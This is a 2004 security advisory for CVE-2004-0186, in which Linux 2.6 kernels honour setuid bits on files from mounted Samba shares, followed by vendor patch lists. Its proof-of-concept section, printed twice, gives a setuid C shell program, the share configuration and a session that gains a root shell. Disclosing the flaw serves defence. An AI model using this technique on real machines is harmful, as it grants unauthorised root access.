Linux Kernel Samba Share Local Privilege Elevation Vulnerability
BID:9619
Info
Linux Kernel Samba Share Local Privilege Elevation Vulnerability
| Bugtraq ID: | 9619 |
| Class: | Access Validation Error |
| CVE: |
CVE-2004-0186 |
| Remote: | No |
| Local: | Yes |
| Published: | Feb 09 2004 12:00AM |
| Updated: | Jul 12 2009 02:06AM |
| Credit: | Discovery of this vulnerability has been credited to Martin Fiala <[email protected]> |
| Vulnerable: |
Samba Samba 2.2.8 a Samba Samba 2.2.7 a Samba Samba 2.2.3 a Samba Samba 2.2.3 a Mandriva Linux Mandrake 9.2 amd64 Mandriva Linux Mandrake 9.2 Mandriva Linux Mandrake 9.1 ppc Mandriva Linux Mandrake 9.1 MandrakeSoft Multi Network Firewall 2.0 MandrakeSoft Corporate Server 2.1 x86_64 MandrakeSoft Corporate Server 2.1 Linux kernel 2.6.1 -rc2 Linux kernel 2.6.1 -rc1 Linux kernel 2.6 -test9-CVS Linux kernel 2.6 -test9 Linux kernel 2.6 -test8 Linux kernel 2.6 -test7 Linux kernel 2.6 -test6 Linux kernel 2.6 -test5 Linux kernel 2.6 -test4 Linux kernel 2.6 -test3 Linux kernel 2.6 -test2 Linux kernel 2.6 -test11 Linux kernel 2.6 -test10 Linux kernel 2.6 -test1 Linux kernel 2.6 Gentoo Linux 1.4 _rc3 Gentoo Linux 1.4 _rc2 Gentoo Linux 1.4 _rc1 Gentoo Linux 1.4 |
| Not Vulnerable: | |
Discussion
Linux Kernel Samba Share Local Privilege Elevation Vulnerability
A local privilege escalation vulnerability has been reported to affect the 2.6 Linux kernel.
The issue appears to exist due to a lack of sufficient sanity checks performed when executing a file that is hosted on a remote Samba share. An attacker may exploit this condition to gain elevated privileges, as the setuid/setgid bit of a remote file is honored on the local system.
A local privilege escalation vulnerability has been reported to affect the 2.6 Linux kernel.
The issue appears to exist due to a lack of sufficient sanity checks performed when executing a file that is hosted on a remote Samba share. An attacker may exploit this condition to gain elevated privileges, as the setuid/setgid bit of a remote file is honored on the local system.
Exploit / POC
Linux Kernel Samba Share Local Privilege Elevation Vulnerability
The following example has been supplied:
"share" - smb server
"slovakia" - smb client
misko@slovakia:~$ smbmount --version
Usage: mount.smbfs service mountpoint [-n] [-o options,...]
Version 3.0.1-Debian
misko@slovakia:~$ ls -l /usr/bin/smbmount
- - -rwxr-xr-x 1 root root 591756 2004-01-13 20:29 /usr/bin/smbmount
misko@slovakia:~$ ls -l /usr/bin/smbmnt
- - -rwsr-sr-x 1 root root 8088 2004-01-13 20:29 /usr/bin/smbmnt
^
Confirmed to be default on Debian and Mandrake.
share:/data/share# cat a.c
main()
{
setuid(0);
setgid(0);
system("/bin/bash");
}
share:/data/share# make a
cc a.c -o a
share:/data/share# chmod +s a
share:/data/share#
share:/etc/samba/smb.conf
[share]
path = /data/share
writable = no
locking = no
public = yes
guest ok = yes
comment = Share
share:/data/share# ls -l a
- - -rwsr-sr-x 1 root root 11716 Feb 8 12:39 a
misko@slovakia:~$ ls -l pokus/a
- - -rwsr-sr-x 1 root root 11716 2004-02-08 12:39 pokus/a
misko@slovakia:~$ pokus/a
root@slovakia:~# id
uid=0(root) gid=0(root) skupiny=1000(misko),0(root),29(audio),100(users),1034(mtr),1035(333)
root@slovakia:~#
The following example has been supplied:
"share" - smb server
"slovakia" - smb client
misko@slovakia:~$ smbmount --version
Usage: mount.smbfs service mountpoint [-n] [-o options,...]
Version 3.0.1-Debian
misko@slovakia:~$ ls -l /usr/bin/smbmount
- - -rwxr-xr-x 1 root root 591756 2004-01-13 20:29 /usr/bin/smbmount
misko@slovakia:~$ ls -l /usr/bin/smbmnt
- - -rwsr-sr-x 1 root root 8088 2004-01-13 20:29 /usr/bin/smbmnt
^
Confirmed to be default on Debian and Mandrake.
share:/data/share# cat a.c
main()
{
setuid(0);
setgid(0);
system("/bin/bash");
}
share:/data/share# make a
cc a.c -o a
share:/data/share# chmod +s a
share:/data/share#
share:/etc/samba/smb.conf
[share]
path = /data/share
writable = no
locking = no
public = yes
guest ok = yes
comment = Share
share:/data/share# ls -l a
- - -rwsr-sr-x 1 root root 11716 Feb 8 12:39 a
misko@slovakia:~$ ls -l pokus/a
- - -rwsr-sr-x 1 root root 11716 2004-02-08 12:39 pokus/a
misko@slovakia:~$ pokus/a
root@slovakia:~# id
uid=0(root) gid=0(root) skupiny=1000(misko),0(root),29(audio),100(users),1034(mtr),1035(333)
root@slovakia:~#
Solution / Fix
Linux Kernel Samba Share Local Privilege Elevation Vulnerability
Solution:
Gentoo have released an advisory (GLSA 200404-21) and have made an updated eBuild available to address this issue. Gentoo have recommended that users run the following commands to merge the fixed eBuild:
# emerge sync
# emerge -pv ">=net-fs/samba-3.0.2a-r2"
# emerge ">=net-fs/samba-3.0.2a-r2"
Those using Samba's password database also need to run the following command:
# pdbedit --force-initialized-passwords
Debian has released an advisory (DSA 463-1) and fixes to address this issue. See the referenced advisory for links to fixed packages.
Mandrake has released an advisory MDKSA-2004:035 and fixes to address this issue. See the referenced advisory for links to fixed packages.
TurboLinux has released advisory TLSA-2004-25 to address this issue. Please see the attached advisory for details on obtaining and applying fixes.
Samba Samba 2.2.3 a
Samba Samba 2.2.3 a
Samba Samba 2.2.7 a
Samba Samba 2.2.8 a
Solution:
Gentoo have released an advisory (GLSA 200404-21) and have made an updated eBuild available to address this issue. Gentoo have recommended that users run the following commands to merge the fixed eBuild:
# emerge sync
# emerge -pv ">=net-fs/samba-3.0.2a-r2"
# emerge ">=net-fs/samba-3.0.2a-r2"
Those using Samba's password database also need to run the following command:
# pdbedit --force-initialized-passwords
Debian has released an advisory (DSA 463-1) and fixes to address this issue. See the referenced advisory for links to fixed packages.
Mandrake has released an advisory MDKSA-2004:035 and fixes to address this issue. See the referenced advisory for links to fixed packages.
TurboLinux has released advisory TLSA-2004-25 to address this issue. Please see the attached advisory for details on obtaining and applying fixes.
Samba Samba 2.2.3 a
-
Debian samba_2.2.3a-13_i386.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-13_i 386.deb
Samba Samba 2.2.3 a
-
Debian libpam-smbpass_2.2.3a-12.3_mipsel.deb
Debian GNU/Linux 3.0 alias woody
http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2. 2.3a-12.3_mipsel.deb -
Debian libpam-smbpass_2.2.3a-13_alpha.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2. 2.3a-13_alpha.deb -
Debian libpam-smbpass_2.2.3a-13_arm.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2. 2.3a-13_arm.deb -
Debian libpam-smbpass_2.2.3a-13_hppa.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2. 2.3a-13_hppa.deb -
Debian libpam-smbpass_2.2.3a-13_i386.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2. 2.3a-13_i386.deb -
Debian libpam-smbpass_2.2.3a-13_ia64.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2. 2.3a-13_ia64.deb -
Debian libpam-smbpass_2.2.3a-13_m68k.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2. 2.3a-13_m68k.deb -
Debian libpam-smbpass_2.2.3a-13_mips.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2. 2.3a-13_mips.deb -
Debian libpam-smbpass_2.2.3a-13_powerpc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2. 2.3a-13_powerpc.deb -
Debian libpam-smbpass_2.2.3a-13_s390.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2. 2.3a-13_s390.deb -
Debian libpam-smbpass_2.2.3a-13_sparc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2. 2.3a-13_sparc.deb -
Debian libsmbclient-dev_2.2.3a-12.3_mipsel.deb
Debian GNU/Linux 3.0 alias woody
http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_ 2.2.3a-12.3_mipsel.deb -
Debian libsmbclient-dev_2.2.3a-13_alpha.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_ 2.2.3a-13_alpha.deb -
Debian libsmbclient-dev_2.2.3a-13_arm.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_ 2.2.3a-13_arm.deb -
Debian libsmbclient-dev_2.2.3a-13_hppa.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_ 2.2.3a-13_hppa.deb -
Debian libsmbclient-dev_2.2.3a-13_i386.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_ 2.2.3a-13_i386.deb -
Debian libsmbclient-dev_2.2.3a-13_ia64.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_ 2.2.3a-13_ia64.deb -
Debian libsmbclient-dev_2.2.3a-13_m68k.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_ 2.2.3a-13_m68k.deb -
Debian libsmbclient-dev_2.2.3a-13_mips.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_ 2.2.3a-13_mips.deb -
Debian libsmbclient-dev_2.2.3a-13_powerpc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_ 2.2.3a-13_powerpc.deb -
Debian libsmbclient-dev_2.2.3a-13_s390.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_ 2.2.3a-13_s390.deb -
Debian libsmbclient-dev_2.2.3a-13_sparc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_ 2.2.3a-13_sparc.deb -
Debian libsmbclient_2.2.3a-12.3_mipsel.deb
Debian GNU/Linux 3.0 alias woody
http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2. 3a-12.3_mipsel.deb -
Debian libsmbclient_2.2.3a-13_alpha.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2. 3a-13_alpha.deb -
Debian libsmbclient_2.2.3a-13_arm.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2. 3a-13_arm.deb -
Debian libsmbclient_2.2.3a-13_hppa.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2. 3a-13_hppa.deb -
Debian libsmbclient_2.2.3a-13_i386.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2. 3a-13_i386.deb -
Debian libsmbclient_2.2.3a-13_ia64.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2. 3a-13_ia64.deb -
Debian libsmbclient_2.2.3a-13_m68k.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2. 3a-13_m68k.deb -
Debian libsmbclient_2.2.3a-13_mips.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2. 3a-13_mips.deb -
Debian libsmbclient_2.2.3a-13_powerpc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2. 3a-13_powerpc.deb -
Debian libsmbclient_2.2.3a-13_s390.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2. 3a-13_s390.deb -
Debian libsmbclient_2.2.3a-13_sparc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2. 3a-13_sparc.deb -
Debian samba-common_2.2.3a-12.3_mipsel.deb
Debian GNU/Linux 3.0 alias woody
http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2. 3a-12.3_mipsel.deb -
Debian samba-common_2.2.3a-13_alpha.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2. 3a-13_alpha.deb -
Debian samba-common_2.2.3a-13_arm.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2. 3a-13_arm.deb -
Debian samba-common_2.2.3a-13_hppa.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2. 3a-13_hppa.deb -
Debian samba-common_2.2.3a-13_i386.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2. 3a-13_i386.deb -
Debian samba-common_2.2.3a-13_ia64.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2. 3a-13_ia64.deb -
Debian samba-common_2.2.3a-13_m68k.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2. 3a-13_m68k.deb -
Debian samba-common_2.2.3a-13_mips.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2. 3a-13_mips.deb -
Debian samba-common_2.2.3a-13_powerpc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2. 3a-13_powerpc.deb -
Debian samba-common_2.2.3a-13_s390.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2. 3a-13_s390.deb -
Debian samba-common_2.2.3a-13_sparc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2. 3a-13_sparc.deb -
Debian samba-doc_2.2.3a-13_all.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/samba-doc_2.2.3a- 13_all.deb -
Debian samba_2.2.3a-12.3_mipsel.deb
Debian GNU/Linux 3.0 alias woody
http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.3 _mipsel.deb -
Debian samba_2.2.3a-13_alpha.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-13_a lpha.deb -
Debian samba_2.2.3a-13_arm.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-13_a rm.deb -
Debian samba_2.2.3a-13_hppa.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-13_h ppa.deb -
Debian samba_2.2.3a-13_ia64.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-13_i a64.deb -
Debian samba_2.2.3a-13_m68k.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-13_m 68k.deb -
Debian samba_2.2.3a-13_mips.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-13_m ips.deb -
Debian samba_2.2.3a-13_powerpc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-13_p owerpc.deb -
Debian samba_2.2.3a-13_s390.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-13_s 390.deb -
Debian samba_2.2.3a-13_sparc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-13_s parc.deb -
Debian smbclient_2.2.3a-12.3_mipsel.deb
Debian GNU/Linux 3.0 alias woody
http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a- 12.3_mipsel.deb -
Debian smbclient_2.2.3a-13_alpha.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a- 13_alpha.deb -
Debian smbclient_2.2.3a-13_arm.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a- 13_arm.deb -
Debian smbclient_2.2.3a-13_hppa.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a- 13_hppa.deb -
Debian smbclient_2.2.3a-13_i386.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a- 13_i386.deb -
Debian smbclient_2.2.3a-13_ia64.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a- 13_ia64.deb -
Debian smbclient_2.2.3a-13_m68k.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a- 13_m68k.deb -
Debian smbclient_2.2.3a-13_mips.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a- 13_mips.deb -
Debian smbclient_2.2.3a-13_powerpc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a- 13_powerpc.deb -
Debian smbclient_2.2.3a-13_s390.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a- 13_s390.deb -
Debian smbclient_2.2.3a-13_sparc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a- 13_sparc.deb -
Debian smbfs_2.2.3a-12.3_mipsel.deb
Debian GNU/Linux 3.0 alias woody
http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12.3 _mipsel.deb -
Debian smbfs_2.2.3a-13_alpha.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-13_a lpha.deb -
Debian smbfs_2.2.3a-13_arm.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-13_a rm.deb -
Debian smbfs_2.2.3a-13_hppa.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-13_h ppa.deb -
Debian smbfs_2.2.3a-13_i386.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-13_i 386.deb -
Debian smbfs_2.2.3a-13_ia64.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-13_i a64.deb -
Debian smbfs_2.2.3a-13_m68k.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-13_m 68k.deb -
Debian smbfs_2.2.3a-13_mips.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-13_m ips.deb -
Debian smbfs_2.2.3a-13_powerpc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-13_p owerpc.deb -
Debian smbfs_2.2.3a-13_s390.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-13_s 390.deb -
Debian smbfs_2.2.3a-13_sparc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-13_s parc.deb -
Debian swat_2.2.3a-12.3_mipsel.deb
Debian GNU/Linux 3.0 alias woody
http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12.3_ mipsel.deb -
Debian swat_2.2.3a-13_alpha.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-13_al pha.deb -
Debian swat_2.2.3a-13_arm.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-13_ar m.deb -
Debian swat_2.2.3a-13_hppa.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-13_hp pa.deb -
Debian swat_2.2.3a-13_i386.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-13_i3 86.deb -
Debian swat_2.2.3a-13_ia64.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-13_ia 64.deb -
Debian swat_2.2.3a-13_m68k.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-13_m6 8k.deb -
Debian swat_2.2.3a-13_mips.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-13_mi ps.deb -
Debian swat_2.2.3a-13_powerpc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-13_po werpc.deb -
Debian swat_2.2.3a-13_s390.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-13_s3 90.deb -
Debian swat_2.2.3a-13_sparc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-13_sp arc.deb -
Debian winbind_2.2.3a-12.3_mipsel.deb
Debian GNU/Linux 3.0 alias woody
http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12 .3_mipsel.deb -
Debian winbind_2.2.3a-13_alpha.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-13 _alpha.deb -
Debian winbind_2.2.3a-13_arm.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-13 _arm.deb -
Debian winbind_2.2.3a-13_hppa.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-13 _hppa.deb -
Debian winbind_2.2.3a-13_i386.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-13 _i386.deb -
Debian winbind_2.2.3a-13_ia64.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-13 _ia64.deb -
Debian winbind_2.2.3a-13_m68k.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-13 _m68k.deb -
Debian winbind_2.2.3a-13_mips.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-13 _mips.deb -
Debian winbind_2.2.3a-13_powerpc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-13 _powerpc.deb -
Debian winbind_2.2.3a-13_s390.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-13 _s390.deb -
Debian winbind_2.2.3a-13_sparc.deb
Debian GNU/Linux 3.0 (woody)
http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-13 _sparc.deb
Samba Samba 2.2.7 a
-
Mandrake nss_wins-2.2.7a-10.1.C21mdk.i586.rpm
Mandrake Corporate Server 2.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake nss_wins-2.2.7a-10.1.C21mdk.x86_64.rpm
Mandrake Corporate Server 2.1/x86_64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake nss_wins-2.2.7a-9.3.91mdk.i586.rpm
Mandrake Linux 9.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake nss_wins-2.2.7a-9.3.91mdk.ppc.rpm
Mandrake Linux 9.1/PPC
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-client-2.2.7a-10.1.C21mdk.i586.rpm
Mandrake Corporate Server 2.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-client-2.2.7a-10.1.C21mdk.x86_64.rpm
Mandrake Corporate Server 2.1/x86_64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-client-2.2.7a-9.3.91mdk.i586.rpm
Mandrake Linux 9.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-client-2.2.7a-9.3.91mdk.ppc.rpm
Mandrake Linux 9.1/PPC
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-client-2.2.7a-9.3.M82mdk.i586.rpm
Mandrake Multi Network Firewall 8.2
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-common-2.2.7a-10.1.C21mdk.i586.rpm
Mandrake Corporate Server 2.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-common-2.2.7a-10.1.C21mdk.x86_64.rpm
Mandrake Corporate Server 2.1/x86_64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-common-2.2.7a-9.3.91mdk.i586.rpm
Mandrake Linux 9.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-common-2.2.7a-9.3.91mdk.ppc.rpm
Mandrake Linux 9.1/PPC
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-common-2.2.7a-9.3.M82mdk.i586.rpm
Mandrake Multi Network Firewall 8.2
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-server-2.2.7a-10.1.C21mdk.i586.rpm
Mandrake Corporate Server 2.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-server-2.2.7a-10.1.C21mdk.x86_64.rpm
Mandrake Corporate Server 2.1/x86_64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-server-2.2.7a-9.3.91mdk.i586.rpm
Mandrake Linux 9.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-server-2.2.7a-9.3.91mdk.ppc.rpm
Mandrake Linux 9.1/PPC
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-swat-2.2.7a-10.1.C21mdk.i586.rpm
Mandrake Corporate Server 2.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-swat-2.2.7a-10.1.C21mdk.x86_64.rpm
Mandrake Corporate Server 2.1/x86_64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-swat-2.2.7a-9.3.91mdk.i586.rpm
Mandrake Linux 9.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-swat-2.2.7a-9.3.91mdk.ppc.rpm
Mandrake Linux 9.1/PPC
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-winbind-2.2.7a-10.1.C21mdk.i586.rpm
Mandrake Corporate Server 2.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-winbind-2.2.7a-10.1.C21mdk.x86_64.rpm
Mandrake Corporate Server 2.1/x86_64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-winbind-2.2.7a-9.3.91mdk.i586.rpm
Mandrake Linux 9.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-winbind-2.2.7a-9.3.91mdk.ppc.rpm
Mandrake Linux 9.1/PPC
http://www.mandrakesecure.net/en/ftp.php -
TurboLinux samba-2.2.7a-9jaJP.i586.rpm
ftp://ftp.turbolinux.com/pub/TurboLinux/TurboLinux/ia32/Desktop/10/upd ates/RPMS/samba-2.2.7a-9jaJP.i586.rpm -
TurboLinux samba-devel-2.2.7a-9jaJP.i586.rpm
ftp://ftp.turbolinux.com/pub/TurboLinux/TurboLinux/ia32/Desktop/10/upd ates/RPMS/samba-devel-2.2.7a-9jaJP.i586.rpm
Samba Samba 2.2.8 a
-
Mandrake libsmbclient0-2.2.8a-13.1.92mdk.i586.rpm
Mandrake Linux 9.2
http://www.mandrakesecure.net/en/ftp.php -
Mandrake libsmbclient0-devel-2.2.8a-13.1.92mdk.i586.rpm
Mandrake Linux 9.2
http://www.mandrakesecure.net/en/ftp.php -
Mandrake libsmbclient0-static-devel-2.2.8a-13.1.92mdk.i586.rpm
Mandrake Linux 9.2
http://www.mandrakesecure.net/en/ftp.php -
Mandrake nss_wins-2.2.8a-13.1.92mdk.i586.rpm
Mandrake Linux 9.2
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-client-2.2.8a-13.1.92mdk.i586.rpm
Mandrake Linux 9.2
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-common-2.2.8a-13.1.92mdk.i586.rpm
Mandrake Linux 9.2
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-debug-2.2.8a-13.1.92mdk.i586.rpm
Mandrake Linux 9.2
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-server-2.2.8a-13.1.92mdk.i586.rpm
Mandrake Linux 9.2
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-swat-2.2.8a-13.1.92mdk.i586.rpm
Mandrake Linux 9.2
http://www.mandrakesecure.net/en/ftp.php -
Mandrake samba-winbind-2.2.8a-13.1.92mdk.i586.rpm
Mandrake Linux 9.2
http://www.mandrakesecure.net/en/ftp.php
References
Linux Kernel Samba Share Local Privilege Elevation Vulnerability
References:
References:
